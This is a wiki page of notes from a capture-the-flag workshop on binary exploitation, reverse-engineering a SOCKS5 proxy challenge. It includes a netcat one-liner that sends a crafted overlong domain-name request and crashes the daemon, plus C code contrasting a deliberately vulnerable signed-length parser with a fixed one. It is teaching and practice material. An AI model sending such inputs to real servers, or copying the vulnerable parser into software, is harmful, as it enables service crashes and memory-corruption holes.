Difference between revisions of "CTF-practice-evening:2014-08-04"
Revision as of 19:07, 4 August 2014
CTF-practice-evening:2014-08-04 |
---|---
Date | 2014/08/04
Time |
Location | ACTA
Type | Workshop
Contact | Melanie
Capture The Flag evening - Part 23
- 4 August, 2014 - 7 PM
- Please bring along a laptop!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
Binary Exploitation
- Brainsmoke is talking about binary exploitation today
Examining the challenge
- objdump -d: shows the disassembly; if the binary is not stripped you also get function symbols
- This binary has mangled C++ symbols (c++filt turns them back into readable names)
- From running it, the program appears to be a daemon of some kind - a Socks proxy
- This is a proxy for TCP - we can look at the protocol details w/ Google
- netstat -uplanet (lists the listening TCP/UDP ports together with the owning process; the daemon sits on port 1080, the standard SOCKS port)
- What was added between SOCKS4 and SOCKS5? Newly added code is a good place to look for a bug
- Authentication (method negotiation) and connecting directly to a domain name (address type 0x03) instead of only an IPv4 address
- Most of the fields are fixed length
- But the domain name is a variable-length string, so that is where a buffer overflow could be
- The name is preceded by a 1-byte length field; if the code stores that byte in a signed char, values from 0x80 upwards (128 to 255) come out as negative numbers
- Passing such a negative number to a read as an (unsigned) size turns it into a huge count, so the program tries to read far more bytes than the name buffer holds
- We want to find out what happens when we tell the program the name is 255 bytes long (any length byte with the high bit set will do) and then send more data than fits
- We want to establish a connection
- We need to specify Socks5
- Use xxd to build the raw bytes (xxd -r -p turns a hex string into binary; plain xxd does the reverse)
- Example: xxd -r -p <<< 41414141410a prints AAAAA followed by a newline (0x41 = A, 0x0a = newline)
- xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (authentication: 05 = SOCKS version 5, 01 = one method offered, 00 = no authentication; a server that agrees answers 05 00)
- hexdump -C file
- (xxd -r -p <<< "050100 0501000380"; python <<< 'print "A"*2000') | nc localhost 1080 | dd bs=1 > file (connection request: the greeting again, then 05 = version, 01 = CONNECT, 00 = reserved, 03 = domain-name address type, 80 = name length 128, which is negative as a signed byte, followed by 2000 bytes of A as the "name")
- We're following along w/ the protocol here
- It crashed - a child exited with signal 6 (SIGABRT), which usually means abort() was called, e.g. by glibc's stack-protector or heap consistency checks when they notice corruption
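Added example, not code from the workshop or from the challenge binary: a small C model of the two things the notes above work through, the bytes the xxd/python pipeline sends (greeting 05 01 00, then 05 01 00 03 80 followed by 2000 bytes of A) and why a one-byte name length that lands in a signed char turns into a huge read. The real parser in the challenge binary is not known; parse_vuln is an assumed minimal reconstruction of the bug the notes hypothesise, parse_fixed is the corresponding checked version, and the server reply used in main() is constructed, not captured.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SOCKS5_VER   0x05
#define CMD_CONNECT  0x01
#define ATYP_DOMAIN  0x03

/* Greeting the notes send first: version 5, one auth method offered, 0x00 = no auth.
 * A server that accepts it answers with 05 00. */
static const unsigned char GREETING[3] = { SOCKS5_VER, 0x01, 0x00 };

int greeting_accepted(const unsigned char *reply, size_t n)
{
    return n >= 2 && reply[0] == SOCKS5_VER && reply[1] == 0x00;
}

/* Build the CONNECT request the xxd/python pipeline produces:
 * 05 01 00 03 <len_byte> followed by `pad` bytes of 'A' as the fake domain name.
 * Returns the number of bytes written, or 0 if `cap` is too small. */
size_t build_connect_request(unsigned char *out, size_t cap, uint8_t len_byte, size_t pad)
{
    if (cap < 5 + pad)
        return 0;
    out[0] = SOCKS5_VER;
    out[1] = CMD_CONNECT;
    out[2] = 0x00;            /* reserved */
    out[3] = ATYP_DOMAIN;
    out[4] = len_byte;        /* one-byte name length */
    memset(out + 5, 'A', pad);
    return 5 + pad;
}

struct parsed {
    int    ok;         /* 1 if the fixed header was accepted */
    size_t name_len;   /* how many name bytes the parser will go on to read */
    char   name[256];  /* copied name (fixed parser only); 255 bytes + NUL always fit */
};

/* Assumed reconstruction of the hypothesised bug: the length byte is stored in a
 * signed char (plain `char` is signed on x86; `signed char` is written out here so
 * the result is the same on every platform). 0x80..0xFF become -128..-1, and
 * converting that to size_t for a read()/memcpy length sign-extends to a value
 * near SIZE_MAX, far beyond any name buffer. */
struct parsed parse_vuln(const unsigned char *buf, size_t n)
{
    struct parsed r = { 0, 0, { 0 } };
    if (n < 5 || buf[0] != SOCKS5_VER || buf[1] != CMD_CONNECT || buf[3] != ATYP_DOMAIN)
        return r;
    signed char len = (signed char)buf[4];   /* bug: signed one-byte length */
    r.name_len = (size_t)len;                /* sign-extended: 0x80 -> SIZE_MAX - 127 */
    r.ok = 1;
    /* a real server would now read()/memcpy r.name_len bytes into a small buffer */
    return r;
}

/* Hardened version: keep the length unsigned (0..255), check it against what was
 * actually received, and copy into a buffer sized for the maximum. */
struct parsed parse_fixed(const unsigned char *buf, size_t n)
{
    struct parsed r = { 0, 0, { 0 } };
    if (n < 5 || buf[0] != SOCKS5_VER || buf[1] != CMD_CONNECT || buf[3] != ATYP_DOMAIN)
        return r;
    uint8_t len = buf[4];
    if (len == 0 || (size_t)len > n - 5)     /* empty name or truncated request */
        return r;
    memcpy(r.name, buf + 5, len);            /* len <= 255 < sizeof r.name */
    r.name[len] = '\0';
    r.name_len = len;
    r.ok = 1;
    return r;
}

int main(void)
{
    unsigned char msg[2100];
    unsigned char reply[2] = { 0x05, 0x00 };   /* constructed: a server accepting GREETING */
    size_t n = build_connect_request(msg, sizeof msg, 0x80, 2000);
    struct parsed v = parse_vuln(msg, n);
    struct parsed f = parse_fixed(msg, n);

    printf("greeting sent: %02x %02x %02x, accepted: %d\n",
           GREETING[0], GREETING[1], GREETING[2], greeting_accepted(reply, sizeof reply));
    printf("request is %zu bytes, length byte 0x%02x\n", n, msg[4]);
    printf("vulnerable parser wants to read %zu bytes\n", v.name_len);
    printf("fixed parser reads %zu bytes\n", f.name_len);
    return 0;
}
```

With the length byte 0x80 the signed parser ends up asking for SIZE_MAX - 127 bytes, which is why the 2000 bytes of A that follow overrun whatever stack or heap buffer the name was meant to land in; the checked parser reads exactly 128 and rejects a request that is shorter than its own length field claims.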